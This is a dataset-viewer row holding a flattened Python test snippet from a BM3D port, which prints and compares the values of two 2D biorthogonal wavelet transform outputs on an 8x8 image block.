| BM3D_py/cpp2py_test/bior_2d_forward_test2.py | 1,620 | img = img[0:8, 0:8] original way my way a, b = 0, 8 c, d = 0, 8 print('original_bior_img\n', original_bior_img[a:b, c:d].astype(np.int)) print('bior_img\n', bior_img[a:b, c:d].astype(np.int)) print('max original_bior_img', np.max(original_bior_img)) print('min original_bior_img', np.min(original_bior_img)) print('max bior_img', np.max(bior_img)) print('min bior_img', np.min(bior_img)) | 387 | es | 0.398449 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.